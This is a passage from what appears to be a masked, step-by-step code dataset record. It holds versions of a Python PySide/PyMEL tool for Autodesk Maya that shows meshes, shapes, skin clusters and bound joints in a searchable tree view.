list(set(pm.listRelatives(shapesList, parent=True)))\n transformList.sort()\n return transformList\n\n @staticmethod\n def getAllShapes(transforms):\n \"\"\"\n @param transforms: List. \n return : dictionnary with key:mesh / values: shapes\n \"\"\"\n shapes_dic = {}\n for transform in transforms:\n all_shapes = pm.PyNode(transform).getShapes(ni=True)\n shapes_dic.update({str(transform): all_shapes})\n return shapes_dic\n\n def getSkinClusterbyShape(self, shapes):\n \"\"\"\n get skinCluster attached to the shape\n @param shapes: List\n return: List\n \"\"\"\n cluster_dic = {}\n for shape in shapes:\n try:\n incoming = mc.listConnections('{}.inMesh'.format(shape))[0]\n if pm.objectType(incoming) == 'skinCluster':\n cluster_dic.update({str(shape): incoming})\n else:\n skinCluster = self.getSkinCluster(shape)\n if skinCluster:\n if len(skinCluster) > 1:\n cluster_dic.update({str(shape): 'None'})\n else:\n cluster_dic.update({str(shape): skinCluster})\n else:\n cluster_dic.update({str(shape): 'None'})\n except TypeError:\n cluster_dic.update({str(shape): 'None'})\n return cluster_dic\n\n\n<mask token>\n",
"step-2": "<mask token>\n\n\nclass MultiSkin_UI(MayaQWidgetDockableMixin, QtWidgets.QDialog):\n <mask token>\n <mask token>\n <mask token>\n\n def widgetsAndLayouts(self):\n\n def addLine():\n line = QtWidgets.QFrame()\n line.setFrameShape(QtWidgets.QFrame.HLine)\n return line\n\n def addText(message, alignement=QtCore.Qt.AlignCenter, height=30,\n bold=False):\n myFont = QtGui.QFont()\n myFont.setBold(bold)\n text = QtWidgets.QLabel(message)\n text.setAlignment(alignement)\n text.setFixedHeight(height)\n text.setFont(myFont)\n return text\n self.vLayoutAndFunctions = [['treeWidget', [1, 1, 1, 1]]]\n self.vlayout = {}\n for layoutName, margins in self.vLayoutAndFunctions:\n self.vlayout[layoutName] = QtWidgets.QVBoxLayout()\n self.vlayout[layoutName].setContentsMargins(margins[0], margins\n [1], margins[2], margins[3])\n self.hLayoutAndFunctions = [['filterOptions', [1, 1, 1, 1]], [\n 'buttonsOptions', [1, 1, 1, 1]], ['searchBarWidget', [1, 1, 1, 1]]]\n self.hlayout = {}\n for layoutName, margins in self.hLayoutAndFunctions:\n self.hlayout[layoutName] = QtWidgets.QHBoxLayout()\n self.hlayout[layoutName].setContentsMargins(margins[0], margins\n [1], margins[2], margins[3])\n self.searchBar = QtWidgets.QLineEdit()\n self.searchBar.setPlaceholderText('Search...')\n self.searchBar.textEdited.connect(self.searchBarEdited)\n self.hlayout['searchBarWidget'].addWidget(self.searchBar)\n self.matchCaseChx = QtWidgets.QCheckBox()\n self.matchCaseChx.setChecked(False)\n self.matchCaseChx.setText('Match Case')\n self.matchCaseChx.stateChanged.connect(self.searchBarEdited)\n self.allFilter = QtWidgets.QRadioButton('All', self)\n self.allFilter.setChecked(True)\n self.allFilter.toggled.connect(self.refreshQtree)\n self.skinClusterFilter = QtWidgets.QRadioButton('Skin Clusters', self)\n self.skinClusterFilter.setChecked(True)\n self.skinClusterFilter.toggled.connect(self.refreshQtree)\n self.meshTreeWidget = QtWidgets.QTreeWidget()\n self.meshTreeWidget.setHeaderLabel('Cloth Tree View')\n self.meshTreeWidget.setSelectionMode(self.meshTreeWidget.\n ExtendedSelection)\n self.vlayout['treeWidget'].addWidget(self.meshTreeWidget)\n header = QtWidgets.QTreeWidgetItem(['Geometries'])\n self.meshTreeWidget.setHeaderItem(header)\n self.meshTreeWidget.itemClicked.connect(self.singleClickedAction)\n self.meshTreeWidget.itemSelectionChanged.connect(self.\n singleClickedAction)\n self.refreshQtree()\n\n def create_Button(self):\n \"\"\" Create the buttons \"\"\"\n self.buttonAndFunctions = [['Show Selected', self.showSelected, 0,\n pyQtDic['colorLightGrey'], '', self.hlayout['searchBarWidget'],\n '', 30], ['Refresh', self.refreshQtree, 0, pyQtDic[\n 'colorLightGrey'], '', self.hlayout['filterOptions'], '', 30],\n ['Clear', self.meshTreeWidget.clear, 0, pyQtDic[\n 'colorLightGrey'], '', self.hlayout['filterOptions'], '', 30],\n ['Expand All', self.expandTree, 0, pyQtDic['colorLightGrey'],\n '', self.hlayout['buttonsOptions'], '', 30], ['Close All', self\n .closeTree, 0, pyQtDic['colorLightGrey'], '', self.hlayout[\n 'buttonsOptions'], '', 30]]\n self.buttons = {}\n for buttonName, buttonFunction, _, labColor, bgColor, layout, layout_coord, width in self.buttonAndFunctions:\n self.buttons[buttonName] = adbRC.CustomQPushButton(buttonName)\n self.buttons[buttonName].clicked.connect(buttonFunction)\n try:\n layout.addWidget(self.buttons[buttonName], int(layout_coord\n .split(',')[0]), int(layout_coord.split(',')[1]))\n except ValueError:\n layout.addWidget(self.buttons[buttonName])\n _optionsExpandAll = self.buttons['Expand All'].addButtonActions([\n 'Shapes', 'Skin Clusters'])\n _optionsExpandAll['Shapes'].triggered.connect(lambda : self.\n expandTree('shape'))\n _optionsExpandAll['Skin Clusters'].triggered.connect(lambda : self.\n expandTree('skin cluster'))\n _optionsCloseAll = self.buttons['Close All'].addButtonActions([\n 'Shapes', 'Skin Clusters'])\n _optionsCloseAll['Shapes'].triggered.connect(lambda : self.\n closeTree('shape'))\n _optionsCloseAll['Skin Clusters'].triggered.connect(lambda : self.\n closeTree('skin cluster'))\n\n def buildMainLayout(self):\n self.main_layout.addLayout(self.hlayout['filterOptions'])\n self.hlayout['filterOptions'].addWidget(self.allFilter)\n self.hlayout['filterOptions'].addWidget(self.skinClusterFilter)\n self.hlayout['filterOptions'].addStretch()\n self.main_layout.addLayout(self.hlayout['searchBarWidget'])\n self.hlayout['searchBarWidget'].addWidget(self.matchCaseChx)\n self.main_layout.addLayout(self.hlayout['buttonsOptions'])\n self.main_layout.addLayout(self.vlayout['treeWidget'])\n\n def refreshQtree(self):\n self.meshTreeWidget.clear()\n all_status = self.allFilter.isChecked()\n if all_status:\n _filter = 'all'\n else:\n _filter = 'skinClusters'\n self.filterList = self.filterMeshes(filter=_filter)\n self.populateQTree(self.filterList)\n\n def getSearchBarText(self):\n searchBarText = self.searchBar.text()\n return searchBarText\n\n def searchBarEdited(self):\n matchCase = bool(self.matchCaseChx.checkState())\n query = self.searchBar.text()\n if matchCase:\n query_words = str(query).split(' ')\n else:\n query_words = str(query).lower().split(' ')\n query_words = filter(None, query_words)\n scoreList = {}\n for item in [str(x) for x in self.filterList]:\n score = 0\n for query_word in query_words:\n if matchCase:\n if query_word in item:\n score += 1\n elif query_word in item.lower():\n score += 1\n scoreList[item] = score\n sorted_matches = [i for i in scoreList.items() if i[1] >= len(\n query_words)]\n sorted_matches = sorted(sorted_matches, key=lambda x: x[0])\n sorted_matches_string = [name for name, index in sorted_matches]\n self.meshTreeWidget.clear()\n self.populateQTree(sorted_matches_string)\n <mask token>\n\n def closeTree(self, type='mesh'):\n if type == 'mesh':\n [root.setExpanded(False) for root in self.roots]\n elif type == 'shape':\n [shape.setExpanded(False) for shape in self.QtShapes]\n elif type == 'skin cluster':\n [sclus.setExpanded(False) for sclus in self.QTClusters]\n\n def expandTree(self, type='mesh'):\n if type == 'mesh':\n [root.setExpanded(True) for root in self.roots]\n elif type == 'shape':\n [shape.setExpanded(True) for shape in self.QtShapes]\n elif type == 'skin cluster':\n [sclus.setExpanded(True) for sclus in self.QTClusters]\n\n def showSelected(self):\n selection = pm.selected()\n selection.sort()\n self.meshTreeWidget.clear()\n self.populateQTree(selection)\n\n def singleClickedAction(self):\n mySelection = self.meshTreeWidget.selectedItems()\n str_selected = [x.text(0) for x in mySelection]\n pm.select(str_selected, r=1)\n\n def filterMeshes(self, filter='all'):\n \"\"\"\n filter:\n all : all meshes\n skinClusters : all meshes with skinClusters\n None\n \"\"\"\n if filter == 'all':\n return self.getAllMeshes()\n elif filter == 'skinClusters':\n clusters = pm.ls(type='skinCluster')\n meshesShapes = set(sum([pm.skinCluster(c, q=1, geometry=1) for\n c in clusters], []))\n meshes = set([x.getParent() for x in meshesShapes if pm.\n objectType(x) == 'mesh'])\n return meshes\n elif filter == 'None':\n return None\n\n @staticmethod\n def test():\n print('test')\n\n @staticmethod\n def getSkinCluster(_transform):\n \"\"\"\n Find a SkinCluster from a transform\n Returns the skinCluster node\n \"\"\"\n result = []\n if not pm.objExists(_transform):\n return result\n validList = mel.eval('findRelatedDeformer(\"' + str(_transform) + '\")')\n if validList is None:\n return result\n for elem in validList:\n if pm.nodeType(elem) == 'skinCluster':\n result.append(elem)\n pm.select(result, r=True)\n result_node = pm.selected()\n if len(result_node) > 1:\n return result_node\n else:\n try:\n return result_node[0]\n except IndexError:\n return False\n\n @staticmethod\n def getBindJointsFromCluster(clusterList):\n \"\"\"\n Find all joints attached to a skinCluster\n @param clusterList: List. list of skin Clusters\n return dic with key: skin Cluster. Value: list of joint \n \"\"\"\n bindJoints_dic = {}\n for cluster in clusterList:\n all_binds_jnts = [x for x in pm.listConnections(str(cluster) +\n '.matrix[*]', s=1)]\n bindJoints_dic.update({str(cluster): all_binds_jnts})\n return bindJoints_dic\n\n @staticmethod\n def getAllMeshes():\n \"\"\"\n return: list of all meshes / geometry\n \"\"\"\n shapesList = pm.ls(type='mesh', ni=1)\n transformList = list(set(pm.listRelatives(shapesList, parent=True)))\n transformList.sort()\n return transformList\n\n @staticmethod\n def getAllShapes(transforms):\n \"\"\"\n @param transforms: List. \n return : dictionnary with key:mesh / values: shapes\n \"\"\"\n shapes_dic = {}\n for transform in transforms:\n all_shapes = pm.PyNode(transform).getShapes(ni=True)\n shapes_dic.update({str(transform): all_shapes})\n return shapes_dic\n\n def getSkinClusterbyShape(self, shapes):\n \"\"\"\n get skinCluster attached to the shape\n @param shapes: List\n return: List\n \"\"\"\n cluster_dic = {}\n for shape in shapes:\n try:\n incoming = mc.listConnections('{}.inMesh'.format(shape))[0]\n if pm.objectType(incoming) == 'skinCluster':\n cluster_dic.update({str(shape): incoming})\n else:\n skinCluster = self.getSkinCluster(shape)\n if skinCluster:\n if len(skinCluster) > 1:\n cluster_dic.update({str(shape): 'None'})\n else:\n cluster_dic.update({str(shape): skinCluster})\n else:\n cluster_dic.update({str(shape): 'None'})\n except TypeError:\n cluster_dic.update({str(shape): 'None'})\n return cluster_dic\n\n\n<mask token>\n",
"step-3": "<mask token>\n\n\nclass MultiSkin_UI(MayaQWidgetDockableMixin, QtWidgets.QDialog):\n __dialog = None\n\n @classmethod\n def show_dialog(cls):\n if cls.__dialog is None:\n cls.__dialog = cls()\n else:\n cls.__dialog.raise_()\n cls.__dialog.show()\n\n def __init__(self, parent=None):\n super(MultiSkin_UI, self).__init__(parent=parent)\n self.meshTreeWidget = QtWidgets.QTreeWidget()\n self.setObjectName('multi skin ui')\n self.starting_height = 500\n self.starting_width = 390\n self.setWindowTitle('adbrower - Multi Skin Tool' + ' v' + str(VERSION))\n self.setWindowFlags(QtCore.Qt.Tool)\n self.setMinimumWidth(self.starting_width)\n self.resize(self.starting_width, self.starting_height)\n self.mainBox = QtWidgets.QVBoxLayout()\n self.mainBox.setContentsMargins(0, 0, 0, 0)\n self.scroll_layout = QtWidgets.QScrollArea()\n self.mainBox.addWidget(self.scroll_layout)\n self.setLayout(self.mainBox)\n self.scroll_layout.setContentsMargins(0, 0, 0, 0)\n self.scroll_layout.setWidgetResizable(True)\n self.scroll_layout.setFrameStyle(QtWidgets.QFrame.NoFrame)\n self.scroll_layout.setFrameShadow(QtWidgets.QFrame.Plain)\n self.scroll_widget = QtWidgets.QWidget()\n self.scroll_layout.setWidget(self.scroll_widget)\n self.main_layout = QtWidgets.QVBoxLayout()\n self.main_layout.setContentsMargins(*([5] * 4))\n self.main_layout.setSpacing(2)\n self.setLayout(self.main_layout)\n self.scroll_widget.setLayout(self.main_layout)\n self.widgetsAndLayouts()\n self.create_Button()\n self.buildMainLayout()\n\n def widgetsAndLayouts(self):\n\n def addLine():\n line = QtWidgets.QFrame()\n line.setFrameShape(QtWidgets.QFrame.HLine)\n return line\n\n def addText(message, alignement=QtCore.Qt.AlignCenter, height=30,\n bold=False):\n myFont = QtGui.QFont()\n myFont.setBold(bold)\n text = QtWidgets.QLabel(message)\n text.setAlignment(alignement)\n text.setFixedHeight(height)\n text.setFont(myFont)\n return text\n self.vLayoutAndFunctions = [['treeWidget', [1, 1, 1, 1]]]\n self.vlayout = {}\n for layoutName, margins in self.vLayoutAndFunctions:\n self.vlayout[layoutName] = QtWidgets.QVBoxLayout()\n self.vlayout[layoutName].setContentsMargins(margins[0], margins\n [1], margins[2], margins[3])\n self.hLayoutAndFunctions = [['filterOptions', [1, 1, 1, 1]], [\n 'buttonsOptions', [1, 1, 1, 1]], ['searchBarWidget', [1, 1, 1, 1]]]\n self.hlayout = {}\n for layoutName, margins in self.hLayoutAndFunctions:\n self.hlayout[layoutName] = QtWidgets.QHBoxLayout()\n self.hlayout[layoutName].setContentsMargins(margins[0], margins\n [1], margins[2], margins[3])\n self.searchBar = QtWidgets.QLineEdit()\n self.searchBar.setPlaceholderText('Search...')\n self.searchBar.textEdited.connect(self.searchBarEdited)\n self.hlayout['searchBarWidget'].addWidget(self.searchBar)\n self.matchCaseChx = QtWidgets.QCheckBox()\n self.matchCaseChx.setChecked(False)\n self.matchCaseChx.setText('Match Case')\n self.matchCaseChx.stateChanged.connect(self.searchBarEdited)\n self.allFilter = QtWidgets.QRadioButton('All', self)\n self.allFilter.setChecked(True)\n self.allFilter.toggled.connect(self.refreshQtree)\n self.skinClusterFilter = QtWidgets.QRadioButton('Skin Clusters', self)\n self.skinClusterFilter.setChecked(True)\n self.skinClusterFilter.toggled.connect(self.refreshQtree)\n self.meshTreeWidget = QtWidgets.QTreeWidget()\n self.meshTreeWidget.setHeaderLabel('Cloth Tree View')\n self.meshTreeWidget.setSelectionMode(self.meshTreeWidget.\n ExtendedSelection)\n self.vlayout['treeWidget'].addWidget(self.meshTreeWidget)\n header = QtWidgets.QTreeWidgetItem(['Geometries'])\n self.meshTreeWidget.setHeaderItem(header)\n self.meshTreeWidget.itemClicked.connect(self.singleClickedAction)\n self.meshTreeWidget.itemSelectionChanged.connect(self.\n singleClickedAction)\n self.refreshQtree()\n\n def create_Button(self):\n \"\"\" Create the buttons \"\"\"\n self.buttonAndFunctions = [['Show Selected', self.showSelected, 0,\n pyQtDic['colorLightGrey'], '', self.hlayout['searchBarWidget'],\n '', 30], ['Refresh', self.refreshQtree, 0, pyQtDic[\n 'colorLightGrey'], '', self.hlayout['filterOptions'], '', 30],\n ['Clear', self.meshTreeWidget.clear, 0, pyQtDic[\n 'colorLightGrey'], '', self.hlayout['filterOptions'], '', 30],\n ['Expand All', self.expandTree, 0, pyQtDic['colorLightGrey'],\n '', self.hlayout['buttonsOptions'], '', 30], ['Close All', self\n .closeTree, 0, pyQtDic['colorLightGrey'], '', self.hlayout[\n 'buttonsOptions'], '', 30]]\n self.buttons = {}\n for buttonName, buttonFunction, _, labColor, bgColor, layout, layout_coord, width in self.buttonAndFunctions:\n self.buttons[buttonName] = adbRC.CustomQPushButton(buttonName)\n self.buttons[buttonName].clicked.connect(buttonFunction)\n try:\n layout.addWidget(self.buttons[buttonName], int(layout_coord\n .split(',')[0]), int(layout_coord.split(',')[1]))\n except ValueError:\n layout.addWidget(self.buttons[buttonName])\n _optionsExpandAll = self.buttons['Expand All'].addButtonActions([\n 'Shapes', 'Skin Clusters'])\n _optionsExpandAll['Shapes'].triggered.connect(lambda : self.\n expandTree('shape'))\n _optionsExpandAll['Skin Clusters'].triggered.connect(lambda : self.\n expandTree('skin cluster'))\n _optionsCloseAll = self.buttons['Close All'].addButtonActions([\n 'Shapes', 'Skin Clusters'])\n _optionsCloseAll['Shapes'].triggered.connect(lambda : self.\n closeTree('shape'))\n _optionsCloseAll['Skin Clusters'].triggered.connect(lambda : self.\n closeTree('skin cluster'))\n\n def buildMainLayout(self):\n self.main_layout.addLayout(self.hlayout['filterOptions'])\n self.hlayout['filterOptions'].addWidget(self.allFilter)\n self.hlayout['filterOptions'].addWidget(self.skinClusterFilter)\n self.hlayout['filterOptions'].addStretch()\n self.main_layout.addLayout(self.hlayout['searchBarWidget'])\n self.hlayout['searchBarWidget'].addWidget(self.matchCaseChx)\n self.main_layout.addLayout(self.hlayout['buttonsOptions'])\n self.main_layout.addLayout(self.vlayout['treeWidget'])\n\n def refreshQtree(self):\n self.meshTreeWidget.clear()\n all_status = self.allFilter.isChecked()\n if all_status:\n _filter = 'all'\n else:\n _filter = 'skinClusters'\n self.filterList = self.filterMeshes(filter=_filter)\n self.populateQTree(self.filterList)\n\n def getSearchBarText(self):\n searchBarText = self.searchBar.text()\n return searchBarText\n\n def searchBarEdited(self):\n matchCase = bool(self.matchCaseChx.checkState())\n query = self.searchBar.text()\n if matchCase:\n query_words = str(query).split(' ')\n else:\n query_words = str(query).lower().split(' ')\n query_words = filter(None, query_words)\n scoreList = {}\n for item in [str(x) for x in self.filterList]:\n score = 0\n for query_word in query_words:\n if matchCase:\n if query_word in item:\n score += 1\n elif query_word in item.lower():\n score += 1\n scoreList[item] = score\n sorted_matches = [i for i in scoreList.items() if i[1] >= len(\n query_words)]\n sorted_matches = sorted(sorted_matches, key=lambda x: x[0])\n sorted_matches_string = [name for name, index in sorted_matches]\n self.meshTreeWidget.clear()\n self.populateQTree(sorted_matches_string)\n\n def populateQTree(self, filterList):\n self.roots = [QtWidgets.QTreeWidgetItem(self.meshTreeWidget, [str(\n item)]) for item in filterList]\n [root.setIcon(0, QtGui.QIcon(':/out_mesh.png')) for root in self.roots]\n [root.setExpanded(True) for root in self.roots]\n self.QtShapes = []\n shape_dic = self.getAllShapes(self.getAllMeshes())\n QTroots_dic = {}\n for root in self.roots:\n try:\n QTroots_dic.update({root: shape_dic[root.text(0)]})\n except KeyError:\n pass\n for QTroot, shapesList in QTroots_dic.items():\n [QtWidgets.QTreeWidgetItem(QTroot, [str(shape)]) for shape in\n shapesList]\n child_count = QTroot.childCount()\n children = [QTroot.child(index) for index in range(child_count)]\n [child.setForeground(0, QtGui.QBrush(QtGui.QColor(YELLOW))) for\n child in children]\n [child.setIcon(0, QtGui.QIcon(':/out_transform.png')) for child in\n children]\n [child.setExpanded(True) for child in children]\n [self.QtShapes.append(child) for child in children]\n self.QTClusters = []\n cluster_dic = self.getSkinClusterbyShape(flatList(shape_dic.values()))\n QTshape_dic = {}\n for shape in self.QtShapes:\n QTshape_dic.update({shape: cluster_dic[shape.text(0)]})\n for QTshape, clusterList in QTshape_dic.items():\n if clusterList == 'None':\n pass\n else:\n QtWidgets.QTreeWidgetItem(QTshape, [str(clusterList)])\n child_count = QTshape.childCount()\n children = [QTshape.child(index) for index in range(child_count)]\n [child.setForeground(0, QtGui.QBrush(QtGui.QColor(GREEN))) for\n child in children]\n [child.setIcon(0, QtGui.QIcon(':/cluster.png')) for child in\n children]\n [self.QTClusters.append(child) for child in children]\n bindJoints_dic = self.getBindJointsFromCluster([x for x in\n cluster_dic.values() if x != 'None'])\n QTcluster_dic = {}\n for cluster in self.QTClusters:\n QTcluster_dic.update({cluster: bindJoints_dic[cluster.text(0)]})\n for QTCluster, jointList in QTcluster_dic.items():\n [QtWidgets.QTreeWidgetItem(QTCluster, [str(jnt)]) for jnt in\n jointList]\n child_count = QTCluster.childCount()\n children = [QTCluster.child(index) for index in range(child_count)]\n [child.setForeground(0, QtGui.QBrush(QtGui.QColor(DARKRED))) for\n child in children]\n [child.setIcon(0, QtGui.QIcon(':/out_joint.png')) for child in\n children]\n\n def closeTree(self, type='mesh'):\n if type == 'mesh':\n [root.setExpanded(False) for root in self.roots]\n elif type == 'shape':\n [shape.setExpanded(False) for shape in self.QtShapes]\n elif type == 'skin cluster':\n [sclus.setExpanded(False) for sclus in self.QTClusters]\n\n def expandTree(self, type='mesh'):\n if type == 'mesh':\n [root.setExpanded(True) for root in self.roots]\n elif type == 'shape':\n [shape.setExpanded(True) for shape in self.QtShapes]\n elif type == 'skin cluster':\n [sclus.setExpanded(True) for sclus in self.QTClusters]\n\n def showSelected(self):\n selection = pm.selected()\n selection.sort()\n self.meshTreeWidget.clear()\n self.populateQTree(selection)\n\n def singleClickedAction(self):\n mySelection = self.meshTreeWidget.selectedItems()\n str_selected = [x.text(0) for x in mySelection]\n pm.select(str_selected, r=1)\n\n def filterMeshes(self, filter='all'):\n \"\"\"\n filter:\n all : all meshes\n skinClusters : all meshes with skinClusters\n None\n \"\"\"\n if filter == 'all':\n return self.getAllMeshes()\n elif filter == 'skinClusters':\n clusters = pm.ls(type='skinCluster')\n meshesShapes = set(sum([pm.skinCluster(c, q=1, geometry=1) for\n c in clusters], []))\n meshes = set([x.getParent() for x in meshesShapes if pm.\n objectType(x) == 'mesh'])\n return meshes\n elif filter == 'None':\n return None\n\n @staticmethod\n def test():\n print('test')\n\n @staticmethod\n def getSkinCluster(_transform):\n \"\"\"\n Find a SkinCluster from a transform\n Returns the skinCluster node\n \"\"\"\n result = []\n if not pm.objExists(_transform):\n return result\n validList = mel.eval('findRelatedDeformer(\"' + str(_transform) + '\")')\n if validList is None:\n return result\n for elem in validList:\n if pm.nodeType(elem) == 'skinCluster':\n result.append(elem)\n pm.select(result, r=True)\n result_node = pm.selected()\n if len(result_node) > 1:\n return result_node\n else:\n try:\n return result_node[0]\n except IndexError:\n return False\n\n @staticmethod\n def getBindJointsFromCluster(clusterList):\n \"\"\"\n Find all joints attached to a skinCluster\n @param clusterList: List. list of skin Clusters\n return dic with key: skin Cluster. Value: list of joint \n \"\"\"\n bindJoints_dic = {}\n for cluster in clusterList:\n all_binds_jnts = [x for x in pm.listConnections(str(cluster) +\n '.matrix[*]', s=1)]\n bindJoints_dic.update({str(cluster): all_binds_jnts})\n return bindJoints_dic\n\n @staticmethod\n def getAllMeshes():\n \"\"\"\n return: list of all meshes / geometry\n \"\"\"\n shapesList = pm.ls(type='mesh', ni=1)\n transformList = list(set(pm.listRelatives(shapesList, parent=True)))\n transformList.sort()\n return transformList\n\n @staticmethod\n def getAllShapes(transforms):\n \"\"\"\n @param transforms: List. \n return : dictionnary with key:mesh / values: shapes\n \"\"\"\n shapes_dic = {}\n for transform in transforms:\n all_shapes = pm.PyNode(transform).getShapes(ni=True)\n shapes_dic.update({str(transform): all_shapes})\n return shapes_dic\n\n def getSkinClusterbyShape(self, shapes):\n \"\"\"\n get skinCluster attached to the shape\n @param shapes: List\n return: List\n \"\"\"\n cluster_dic = {}\n for shape in shapes:\n try:\n incoming = mc.listConnections('{}.inMesh'.format(shape))[0]\n if pm.objectType(incoming) == 'skinCluster':\n cluster_dic.update({str(shape): incoming})\n else:\n skinCluster = self.getSkinCluster(shape)\n if skinCluster:\n if len(skinCluster) > 1:\n cluster_dic.update({str(shape): 'None'})\n else:\n cluster_dic.update({str(shape): skinCluster})\n else:\n cluster_dic.update({str(shape): 'None'})\n except TypeError:\n cluster_dic.update({str(shape): 'None'})\n return cluster_dic\n\n\ndef showUI(dialog=False):\n if dialog:\n MultiSkin_UI.show_dialog()\n else:\n global tools_cw_ui\n try:\n tools_cw_ui.deleteLater()\n except:\n pass\n tools_cw_ui = MultiSkin_UI()\n tools_cw_ui.show()\n",
"step-4": "<mask token>\n\n\ndef undo(func):\n \"\"\" \n Puts the wrapped `func` into a single Maya Undo action, then\n undoes it when the function enters the finally: block\n from schworer Github\n \"\"\"\n\n @wraps(func)\n def _undofunc(*args, **kwargs):\n try:\n mc.undoInfo(ock=True)\n return func(*args, **kwargs)\n finally:\n mc.undoInfo(cck=True)\n return _undofunc\n\n\n<mask token>\n\n\nclass MultiSkin_UI(MayaQWidgetDockableMixin, QtWidgets.QDialog):\n __dialog = None\n\n @classmethod\n def show_dialog(cls):\n if cls.__dialog is None:\n cls.__dialog = cls()\n else:\n cls.__dialog.raise_()\n cls.__dialog.show()\n\n def __init__(self, parent=None):\n super(MultiSkin_UI, self).__init__(parent=parent)\n self.meshTreeWidget = QtWidgets.QTreeWidget()\n self.setObjectName('multi skin ui')\n self.starting_height = 500\n self.starting_width = 390\n self.setWindowTitle('adbrower - Multi Skin Tool' + ' v' + str(VERSION))\n self.setWindowFlags(QtCore.Qt.Tool)\n self.setMinimumWidth(self.starting_width)\n self.resize(self.starting_width, self.starting_height)\n self.mainBox = QtWidgets.QVBoxLayout()\n self.mainBox.setContentsMargins(0, 0, 0, 0)\n self.scroll_layout = QtWidgets.QScrollArea()\n self.mainBox.addWidget(self.scroll_layout)\n self.setLayout(self.mainBox)\n self.scroll_layout.setContentsMargins(0, 0, 0, 0)\n self.scroll_layout.setWidgetResizable(True)\n self.scroll_layout.setFrameStyle(QtWidgets.QFrame.NoFrame)\n self.scroll_layout.setFrameShadow(QtWidgets.QFrame.Plain)\n self.scroll_widget = QtWidgets.QWidget()\n self.scroll_layout.setWidget(self.scroll_widget)\n self.main_layout = QtWidgets.QVBoxLayout()\n self.main_layout.setContentsMargins(*([5] * 4))\n self.main_layout.setSpacing(2)\n self.setLayout(self.main_layout)\n self.scroll_widget.setLayout(self.main_layout)\n self.widgetsAndLayouts()\n self.create_Button()\n self.buildMainLayout()\n\n def widgetsAndLayouts(self):\n\n def addLine():\n line = QtWidgets.QFrame()\n line.setFrameShape(QtWidgets.QFrame.HLine)\n return line\n\n def addText(message, alignement=QtCore.Qt.AlignCenter, height=30,\n bold=False):\n myFont = QtGui.QFont()\n myFont.setBold(bold)\n text = QtWidgets.QLabel(message)\n text.setAlignment(alignement)\n text.setFixedHeight(height)\n text.setFont(myFont)\n return text\n self.vLayoutAndFunctions = [['treeWidget', [1, 1, 1, 1]]]\n self.vlayout = {}\n for layoutName, margins in self.vLayoutAndFunctions:\n self.vlayout[layoutName] = QtWidgets.QVBoxLayout()\n self.vlayout[layoutName].setContentsMargins(margins[0], margins\n [1], margins[2], margins[3])\n self.hLayoutAndFunctions = [['filterOptions', [1, 1, 1, 1]], [\n 'buttonsOptions', [1, 1, 1, 1]], ['searchBarWidget', [1, 1, 1, 1]]]\n self.hlayout = {}\n for layoutName, margins in self.hLayoutAndFunctions:\n self.hlayout[layoutName] = QtWidgets.QHBoxLayout()\n self.hlayout[layoutName].setContentsMargins(margins[0], margins\n [1], margins[2], margins[3])\n self.searchBar = QtWidgets.QLineEdit()\n self.searchBar.setPlaceholderText('Search...')\n self.searchBar.textEdited.connect(self.searchBarEdited)\n self.hlayout['searchBarWidget'].addWidget(self.searchBar)\n self.matchCaseChx = QtWidgets.QCheckBox()\n self.matchCaseChx.setChecked(False)\n self.matchCaseChx.setText('Match Case')\n self.matchCaseChx.stateChanged.connect(self.searchBarEdited)\n self.allFilter = QtWidgets.QRadioButton('All', self)\n self.allFilter.setChecked(True)\n self.allFilter.toggled.connect(self.refreshQtree)\n self.skinClusterFilter = QtWidgets.QRadioButton('Skin Clusters', self)\n self.skinClusterFilter.setChecked(True)\n self.skinClusterFilter.toggled.connect(self.refreshQtree)\n self.meshTreeWidget = QtWidgets.QTreeWidget()\n self.meshTreeWidget.setHeaderLabel('Cloth Tree View')\n self.meshTreeWidget.setSelectionMode(self.meshTreeWidget.\n ExtendedSelection)\n self.vlayout['treeWidget'].addWidget(self.meshTreeWidget)\n header = QtWidgets.QTreeWidgetItem(['Geometries'])\n self.meshTreeWidget.setHeaderItem(header)\n self.meshTreeWidget.itemClicked.connect(self.singleClickedAction)\n self.meshTreeWidget.itemSelectionChanged.connect(self.\n singleClickedAction)\n self.refreshQtree()\n\n def create_Button(self):\n \"\"\" Create the buttons \"\"\"\n self.buttonAndFunctions = [['Show Selected', self.showSelected, 0,\n pyQtDic['colorLightGrey'], '', self.hlayout['searchBarWidget'],\n '', 30], ['Refresh', self.refreshQtree, 0, pyQtDic[\n 'colorLightGrey'], '', self.hlayout['filterOptions'], '', 30],\n ['Clear', self.meshTreeWidget.clear, 0, pyQtDic[\n 'colorLightGrey'], '', self.hlayout['filterOptions'], '', 30],\n ['Expand All', self.expandTree, 0, pyQtDic['colorLightGrey'],\n '', self.hlayout['buttonsOptions'], '', 30], ['Close All', self\n .closeTree, 0, pyQtDic['colorLightGrey'], '', self.hlayout[\n 'buttonsOptions'], '', 30]]\n self.buttons = {}\n for buttonName, buttonFunction, _, labColor, bgColor, layout, layout_coord, width in self.buttonAndFunctions:\n self.buttons[buttonName] = adbRC.CustomQPushButton(buttonName)\n self.buttons[buttonName].clicked.connect(buttonFunction)\n try:\n layout.addWidget(self.buttons[buttonName], int(layout_coord\n .split(',')[0]), int(layout_coord.split(',')[1]))\n except ValueError:\n layout.addWidget(self.buttons[buttonName])\n _optionsExpandAll = self.buttons['Expand All'].addButtonActions([\n 'Shapes', 'Skin Clusters'])\n _optionsExpandAll['Shapes'].triggered.connect(lambda : self.\n expandTree('shape'))\n _optionsExpandAll['Skin Clusters'].triggered.connect(lambda : self.\n expandTree('skin cluster'))\n _optionsCloseAll = self.buttons['Close All'].addButtonActions([\n 'Shapes', 'Skin Clusters'])\n _optionsCloseAll['Shapes'].triggered.connect(lambda : self.\n closeTree('shape'))\n _optionsCloseAll['Skin Clusters'].triggered.connect(lambda : self.\n closeTree('skin cluster'))\n\n def buildMainLayout(self):\n self.main_layout.addLayout(self.hlayout['filterOptions'])\n self.hlayout['filterOptions'].addWidget(self.allFilter)\n self.hlayout['filterOptions'].addWidget(self.skinClusterFilter)\n self.hlayout['filterOptions'].addStretch()\n self.main_layout.addLayout(self.hlayout['searchBarWidget'])\n self.hlayout['searchBarWidget'].addWidget(self.matchCaseChx)\n self.main_layout.addLayout(self.hlayout['buttonsOptions'])\n self.main_layout.addLayout(self.vlayout['treeWidget'])\n\n def refreshQtree(self):\n self.meshTreeWidget.clear()\n all_status = self.allFilter.isChecked()\n if all_status:\n _filter = 'all'\n else:\n _filter = 'skinClusters'\n self.filterList = self.filterMeshes(filter=_filter)\n self.populateQTree(self.filterList)\n\n def getSearchBarText(self):\n searchBarText = self.searchBar.text()\n return searchBarText\n\n def 